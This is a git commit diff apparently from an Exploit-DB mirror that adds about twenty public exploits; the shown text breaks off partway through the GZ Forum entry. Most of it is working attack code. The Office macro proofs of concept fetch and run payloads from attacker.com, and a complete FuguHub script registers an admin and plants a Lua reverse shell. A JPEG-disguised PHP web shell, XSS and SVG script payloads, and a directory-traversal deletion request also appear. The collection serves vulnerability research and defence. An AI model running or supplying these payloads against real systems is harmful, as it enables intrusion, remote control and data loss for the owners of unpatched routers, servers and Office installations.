DB: 2023-07-04

20 changes to exploits/shellcodes/ghdb TP-Link TL-WR940N V4 - Buffer OverFlow D-Link DAP-1325 - Broken Access Control Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS) Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE) Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE) FuguHub 8.1 - Remote Code Execution GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS) PodcastGenerator 3.2.9 - Blind SSRF via XML Injection POS Codekop v2.0 - Authenticated Remote Code Execution (RCE) Prestashop 8.0.4 - Cross-Site Scripting (XSS) Rukovoditel 3.4.1 - Multiple Stored XSS Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) spip v4.1.10 - Spoofing Admin account Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS) Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS) WBCE CMS 1.6.1 - Open Redirect & CSRF WebsiteBaker v2.13.3 - Directory Traversal WebsiteBaker v2.13.3 - Stored XSS WP AutoComplete 1.0.4 - Unauthenticated SQLi
2023-07-04 00:16:26 +00:00 · 2023-07-04 00:16:26 +00:00 · ef9b4e5962
commit ef9b4e5962
parent 7807e6f266
20 changed files with 1327 additions and 0 deletions
--- a/exploits/hardware/dos/51561.py
+++ b/exploits/hardware/dos/51561.py
@ -0,0 +1,28 @@
 # Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
 # Date: 2023-06-30
 # country: Iran
 # Exploit Author: Amirhossein Bahramizadeh
 # Category : hardware
 # Dork : /userRpm/WanDynamicIpV6CfgRpm
 # Tested on: Windows/Linux
 # CVE : CVE-2023-36355
 import requests
 # Replace the IP address with the router's IP
 router_ip = '192.168.0.1'
 # Construct the URL with the vulnerable endpoint and parameter
 url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='
 # Replace the payload with a crafted payload that triggers the buffer overflow
 payload = 'A' * 5000  # Example payload, adjust the length as needed
 # Send the GET request with the crafted payload
 response = requests.get(url + payload)
 # Check the response status code
 if response.status_code == 200:
    print('Buffer overflow triggered successfully')
 else:
    print('Buffer overflow not triggered')
--- a/exploits/hardware/webapps/51556.txt
+++ b/exploits/hardware/webapps/51556.txt
@ -0,0 +1,33 @@
 # Exploit Title: D-Link DAP-1325 - Broken Access Control
 # Date: 27-06-2023
 # Exploit Author: ieduardogoncalves
 # Contact : twitter.com/0x00dia
 # Vendor : www.dlink.com
 # Version: Hardware version: A1
 # Firmware version: 1.01
 # Tested on:All Platforms
 1) Description
 Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.
 IN MY CASE,
 Tested repeater IP: http://192.168.0.21/
 Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0
 2) Proof of Concept
 Step 1: Go to
 Repeater Login Page : http://192.168.0.21/
 Step 2:
 Add the payload to URL.
 Payload:
 http://{ip}/cgi-bin/ExportSettings.sh
 Payload:
 https://github.com/eeduardogoncalves/exploit
--- a/exploits/java/webapps/51564.txt
+++ b/exploits/java/webapps/51564.txt
@ -0,0 +1,40 @@
 # Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
 # Date: 1/07/2023
 # Exploit Author: tmrswrr
 # Vendor Homepage: http://www.opencms.org
 # Software Link: https://github.com/alkacon/opencms-core
 # Version: v15.0
 POC:
 1 ) Login in demo page , go to this url
 https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!
 2 ) Click /.galleries/ , after right click any png file  , open gallery, write in search button this payload
 <img src=. onerror=alert(document.domain)>
 3 ) You will be see alert box
 POC:
 1 ) Go to this url , right click any png file, rename title section and write your payload :  <img src=. onerror=alert(document.domain)>
 https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!
 2 ) You will be see alert box , stored xss
 POC:
 1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file
 after save it
 svg file:
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS");
  </script>
 </svg>
 2 ) When click this svg file you will be see alert button
--- a/exploits/multiple/remote/51552.txt
+++ b/exploits/multiple/remote/51552.txt
@ -0,0 +1,51 @@
 ## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
 ## Author: nu11secur1ty
 ## Date: 04.17.2023
 ## Vendor: https://www.microsoft.com/
 ## Software: https://www.microsoft.com/en-us/microsoft-365/
 ## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
 ## CVE-2023-28285
 ## Description:
 The attack itself is carried out locally by a user with authentication
 to the targeted system. An attacker could exploit the vulnerability by
 convincing a victim, through social engineering, to download and open
 a specially crafted file from a website which could lead to a local
 attack on the victim's computer. The attacker can trick the victim to
 open a malicious web page by using a malicious `Word` file for
 `Office-365 API`. After the user will open the file to read it, from
 the API of Office-365, without being asked what it wants to activate,
 etc, he will activate the code of the malicious server, which he will
 inject himself, from this malicious server. Emedietly after this
 click, the attacker can receive very sensitive information! For bank
 accounts, logs from some sniff attacks, tracking of all the traffic of
 the victim without stopping, and more malicious stuff, it depends on
 the scenario and etc.
 STATUS: HIGH Vulnerability
 [+]Exploit:
 The exploit server must be BROADCASTING at the moment when the victim
 hit the button of the exploit!
 [+]PoC:
 ```cmd
 Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s
 http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",
 vbNormalFocus)
 End Sub
 ```
 ## FYI:
 The PoC has a price and this report will be uploaded with a
 description and video of how you can reproduce it only.
 ## Reproduce:
 [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)
 ## Proof and Exploit
 [href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)
 ## Time spend:
 01:30:00
--- a/exploits/multiple/remote/51555.txt
+++ b/exploits/multiple/remote/51555.txt
@ -0,0 +1,40 @@
 ## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
 ## Author: nu11secur1ty
 ## Date: 06.27.2023
 ## Vendor: https://www.microsoft.com/
 ## Software: https://www.microsoft.com/en-us/microsoft-365/excel
 ## Reference: https://portswigger.net/daily-swig/rce
 ## CVE-2023-33137
 ## Description:
 This exploit is connected with third part exploit server, which waits
 for the victim to call him and execute the content from him using the
 pipe posting method! This is absolutely a 0-day exploit! This is
 absolutely dangerous for the victims, who are infected by him!
 When the victim hit the button in the Excel file, it makes a POST
 request to the exploit server, and the server is responding back that
 way: He creates another hidden malicious file and executed it directly
 on the machine of the victim, then everything is disappeared, so
 nasty.
 STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!
 [+]Exploit:
 ```vbs
 Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s
 https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat
 > maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
 End Sub
 ```
 ## Reproduce:
 [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)
 ## Proof and Exploit:
 [href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)
 ## Time spend:
 01:27:00
--- a/exploits/multiple/webapps/51550.py
+++ b/exploits/multiple/webapps/51550.py
@ -0,0 +1,136 @@
 # Exploit Title: FuguHub 8.1 - Remote Code Execution
 # Date: 6/24/2023
 # Exploit Author: redfire359
 # Vendor Homepage: https://fuguhub.com/
 # Software Link: https://fuguhub.com/download.lsp
 # Version: 8.1
 # Tested on: Ubuntu 22.04.1
 # CVE : CVE-2023-24078
 import requests
 from bs4 import BeautifulSoup
 import hashlib
 from random import randint
 from urllib3 import encode_multipart_formdata
 from urllib3.exceptions import InsecureRequestWarning
 import argparse
 from colorama import Fore
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 #Options for user registration, if no user has been created yet
 username = 'admin'
 password = 'password'
 email = 'admin@admin.com'
 parser = argparse.ArgumentParser()
 parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True)
 parser.add_argument("-rp","--rport", help = "http port [Default 80]")
 parser.add_argument("-l","--lhost", help = "Your IP", required = True)
 parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True)
 args = parser.parse_args()
 LHOST = args.lhost
 LPORT = args.lport
 url = args.rhost
 if args.rport != None:
    port = args.rport
 else:
    port = 80
 def main():
    checkAccount()
 def checkAccount():
    print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")
    s = requests.Session()
    # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account
    r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp")
    soup = BeautifulSoup(r.content, 'html.parser')
    search = soup.find('h1')
    if r.status_code == 404:
        print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port")
        exit(0)
    userExists = False
    userText = 'User database already saved'
    for i in search:
        if i.string == userText:
            userExists = True
    if userExists:
        print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..")
        login(r,s)
    else:
        print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}")
        createUser(r,s)
        login(r,s)
 def createUser(r,s):
    data = { email : email ,
            'user' : username ,
            'password' : password ,
            'recoverpassword' : 'on' }
    r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!")
 def login(r,s):
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")
    data = {'ba_username' : username , 'ba_password' : password}
    r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz
    #Veryify login
    login_Success_Title = 'Web-File-Server'
    soup = BeautifulSoup(r.content, 'html.parser')
    search = soup.find('title')
    for i in search:
        if i != login_Success_Title:
            print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...")
            exit(0)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...")
    exploit(r,s)
 def exploit(r,s):
    #Find the file server, default is fs
    r = s.get(f"https://{url}:443/fs/cmsdocs/")
    code = r.status_code
    if code == 404:
        print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ")
        exit(0)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell")
    #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default
    shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while 						true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
    file_content = f'''
 	<h2> Check ur nc listener on the port you put in <h2>
 	<?lsp if request:method() == "GET" then ?>
 		<?lsp
        {shell}
 		?>
 	<?lsp else ?>
 		Wrong request method, goodBye!
 	<?lsp end ?>
 	'''
    files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}
    r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files)
    if r.text == 'ok' :
        print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ")
        r = s.get(f"https://{url}:443/rev.lsp")
 if __name__=='__main__':
    try:
        main()
    except:
        print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")
--- a/exploits/php/webapps/51548.txt
+++ b/exploits/php/webapps/51548.txt
@ -0,0 +1,152 @@
 Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
 Version: 3.4.1
 Bugs:  Multiple Stored XSS
 Technology: PHP
 Vendor URL: https://www.rukovoditel.net/
 Software Link: https://www.rukovoditel.net/download.php
 Date of found: 24-06-2023
 Author: Mirabbas Ağalarov
 Tested on: Linux
 2. Technical Details & POC
 ========================================
               ###XSS-1###
 ========================================
 steps:
 1. login to account
 2. create project (http://localhost/index.php?module=items/items&path=21)
 3. add task
 4. open task
 5. add comment as "<iframe src="https://14.rs"></iframe> "
 POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 241
 Origin: http://localhost
 Connection: close
 Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1
 Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
 Upgrade-Insecure-Requests: 1
 Sec-Fetch-Dest: document
 Sec-Fetch-Mode: navigate
 Sec-Fetch-Site: same-origin
 Sec-Fetch-User: ?1
 form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=
 ===========================
               ###XSS-2###
 ===========================
 1.go to admin account
 2.go to configration => applicaton
 3.Copyright Text set as "<img src=x onerror=alert(1)>"
 POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
 Content-Length: 2766
 Origin: http://localhost
 Connection: close
 Referer: http://localhost/index.php?module=configuration/application
 Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
 Upgrade-Insecure-Requests: 1
 Sec-Fetch-Dest: document
 Sec-Fetch-Mode: navigate
 Sec-Fetch-Site: same-origin
 Sec-Fetch-User: ?1
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="form_session_token"
 ju271AAoy1
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_NAME]"
 Rukovoditel
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"
 ffgsdfgsdfg
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"
 ruko
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="APP_LOGO"; filename=""
 Content-Type: application/octet-stream
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_LOGO]"
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="APP_FAVICON"; filename=""
 Content-Type: application/octet-stream
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_FAVICON]"
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"
 <img src=x onerror=alert(1)>
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"
 english.php
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_SKIN]"
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"
 America/New_York
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"
 10
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"
 m/d/Y
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"
 m/d/Y H:i
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"
 2/./*
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"
 0
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"
 0
 -----------------------------12298384558648010343132232769
 Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"
 0
 -----------------------------12298384558648010343132232769--
--- a/exploits/php/webapps/51549.py
+++ b/exploits/php/webapps/51549.py
@ -0,0 +1,28 @@
 # Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
 # Date: 2023-06-23
 # country: Iran
 # Exploit Author: Amirhossein Bahramizadeh
 # Category : webapps
 # Dork : /print.php?nm_member=
 # Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
 # Tested on: Windows/Linux
 # CVE : CVE-2023-36346
 import requests
 import urllib.parse
 # Set the target URL and payload
 url = "http://example.com/print.php"
 payload = "<script>alert('XSS')</script>"
 # Encode the payload for URL inclusion
 payload = urllib.parse.quote(payload)
 # Build the request parameters
 params = {
    "nm_member": payload
 }
 # Send the request and print the response
 response = requests.get(url, params=params)
 print(response.text)
--- a/exploits/php/webapps/51551.txt
+++ b/exploits/php/webapps/51551.txt
@ -0,0 +1,55 @@
 # Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)
 # Date: 25-05-2023
 # Exploit Author: yuyudhn
 # Vendor Homepage: https://www.codekop.com/
 # Software Link: https://github.com/fauzan1892/pos-kasir-php
 # Version: 2.0
 # Tested on: Linux
 # CVE: CVE-2023-36348
 # Vulnerability description: The application does not sanitize the filename
 parameter when sending data to /fungsi/edit/edit.php?gambar=user. An
 attacker can exploit this issue by uploading a PHP file and accessing it,
 leading to Remote Code Execution.
 # Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/
 # Proof of Concept:
 1. Login to POS Codekop dashboard.
 2. Go to profile settings.
 3. Upload PHP script through Upload Profile Photo.
 Burp Log Example:
 ```
 POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1
 Host: localhost
 Content-Length: 8934
 Cache-Control: max-age=0
 sec-ch-ua:
 sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: ""
 **Upgrade-Insecure-Requests: 1
 Origin: http://localhost
 Content-Type: multipart/form-data;
 boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
 Accept:
 text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Sec-Fetch-User: ?1**
 Sec-Fetch-Dest: document
 Referer: http://localhost/research/pos-kasir-php/index.php?page=user
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv
 Connection: close
 ------WebKitFormBoundarymVBHqH4m6KgKBnpa
 Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"
 Content-Type: image/jpeg
 ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>
 ÿÛC
 -----------------------------
 ```
 PHP Web Shell location:
 http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php
--- a/exploits/php/webapps/51553.txt
+++ b/exploits/php/webapps/51553.txt
@ -0,0 +1,32 @@
 Exploit Title: WebsiteBaker v2.13.3 - Stored XSS
 Application: WebsiteBaker
 Version: 2.13.3
 Bugs:  Stored XSS
 Technology: PHP
 Vendor URL: https://websitebaker.org/pages/en/home.php
 Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
 Date of found: 26.06.2023
 Author: Mirabbas Ağalarov
 Tested on: Linux
 2. Technical Details & POC
 ========================================
 steps:
 1. login to account
 2. go to media
 3. upload svg file
 """
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
 </svg>
 """
 4. go to svg file (http://localhost/media/malas.svg)
--- a/exploits/php/webapps/51554.txt
+++ b/exploits/php/webapps/51554.txt
@ -0,0 +1,30 @@
 Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
 Application: WebsiteBaker
 Version: 2.13.3
 Bugs:  Directory Traversal
 Technology: PHP
 Vendor URL: https://websitebaker.org/pages/en/home.php
 Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
 Date of found: 26.06.2023
 Author: Mirabbas Ağalarov
 Tested on: Linux
 2. Technical Details & POC
 =======================================
 arbitary directory deleting
 GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: close
 Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
 Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
 Upgrade-Insecure-Requests: 1
 Sec-Fetch-Dest: document
 Sec-Fetch-Mode: navigate
 Sec-Fetch-Site: same-origin
--- a/exploits/php/webapps/51557.txt
+++ b/exploits/php/webapps/51557.txt
@ -0,0 +1,59 @@
 ## Exploit Title: spip v4.1.10 - Spoofing Admin account
 ## Author: nu11secur1ty
 ## Date: 06.29.2023
 ## Vendor: https://www.spip.net/en_rubrique25.html
 ## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
 ## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/
 ## Description:
 The malicious user can upload a malicious SVG file which file is not
 filtered by a security function, and he can trick
 the administrator of this system to check his logo by clicking on him
 and visiting, maybe a very dangerous URL.
 Wrong web app website logic, and not well sanitizing upload function.
 STATUS: HIGH- Vulnerability
 [+]Exploit:
 ```SVG
   <svg xmlns="http://www.w3.org/2000/svg"
 xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
     <defs>
       <linearGradient id="badgeGradient">
         <stop offset="0"/>
         <stop offset="1"/>
       </linearGradient>
     </defs>
     <g id="heading">
       <a xlink:href= "https://rb.gy/74f0y">
         <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4
 23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
 18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
 12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C
 7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
 0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
 2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
 12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
 18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C
 24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6
 31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
 29.9,22.3 29.6,22.8 z"/>
         <!--<text id="label" x="5" y="20" transform = "rotate(-15 10
 10)">New</text>-->
         <text id="title" x="40" y="20">Please click on the logo, to
 see our design services, on our website, thank you!</text>
       </a>
     </g>
   </svg>
 ```
 ## Reproduce:
 [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)
 ## Proof and Exploit:
 [href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)
 ## Time spend:
 00:37:00
--- a/exploits/php/webapps/51558.txt
+++ b/exploits/php/webapps/51558.txt
@ -0,0 +1,57 @@
 # Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS
 # Date: 29/06/2023
 # Exploit Author: CraCkEr
 # Vendor: GZ Scripts
 # Vendor Homepage: https://gzscripts.com/
 # Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html
 # Version: 1.8
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 ## Release Notes:
 Allow Attacker to inject malicious code into website, give ability to steal sensitive
 information, manipulate data, and launch additional attacks.
 ## Stored XSS
 -----------------------------------------------
 POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1
 promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1
 -----------------------------------------------
 POST parameter 'first_name' is vulnerable to XSS
 POST parameter 'second_name' is vulnerable to XSS
 POST parameter 'phone' is vulnerable to XSS
 POST parameter 'address_1' is vulnerable to XSS
 POST parameter 'country' is vulnerable to XSS
 ## Steps to Reproduce:
 1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking]
 2. Inject your [XSS Payload] in "First Name"
 3. Inject your [XSS Payload] in "Last Name"
 4. Inject your [XSS Payload] in "Phone"
 5. Inject your [XSS Payload] in "Address Line 1"
 6. Inject your [XSS Payload] in "Country"
 7. Accept with terms & Press [Booking]
   XSS Fired on Local User Browser
 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)
   XSS Will Fire and Executed on his Browser
 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)
   XSS Will Fire and Executed on his Browser
 10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)
   XSS Will Fire and Executed on his Browser
 [-] Done
--- a/exploits/php/webapps/51559.txt
+++ b/exploits/php/webapps/51559.txt
@ -0,0 +1,73 @@
 # Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)
 # Date: 30/06/2023
 # Exploit Author: CraCkEr
 # Vendor: GZ Scripts
 # Vendor Homepage: https://gzscripts.com/
 # Software Link: https://gzscripts.com/gz-forum-script.html
 # Version: 1.8
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 ## Release Notes:
 Reflected XSS:
 The attacker can send to victim a link containing a malicious URL in an email or
 instant message can perform a wide variety of actions, such as stealing the victim's
 session token or login credentials
 Stored XSS
 Allow Attacker to inject malicious code into website, give ability to steal sensitive
 information, manipulate data, and launch additional attacks.
 ## Reflected XSS
 Path: /preview.php
 GET 'catid' parameter is vulnerable to RXSS
 http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a
 Path: /preview.php
 GET 'topicid' parameter is vulnerable to RXSS
 http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2
 ## Stored XSS
 -----------------------------------------------
 POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1
 -----------------------------39829578812616571248381709325
 Content-Disposition: form-data; name="free_name"
 <script>alert(1)</script>
 -----------------------------39829578812616571248381709325
 Content-Disposition: form-data; name="topic"
 <script>alert(1)</script>
 -----------------------------39829578812616571248381709325
 Content-Disposition: form-data; name="topic_message"
 <script>alert(1)</script>
 -----------------------------39829578812616571248381709325--
 -----------------------------------------------
 POST parameter 'free_name' is vulnerable to XSS
 POST parameter 'topic' is vulnerable to XSS
 POST parameter 'topic_message' is vulnerable to XSS
 ## Steps to Reproduce:
 1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic)
 2. Inject your [XSS Payload] in "Name"
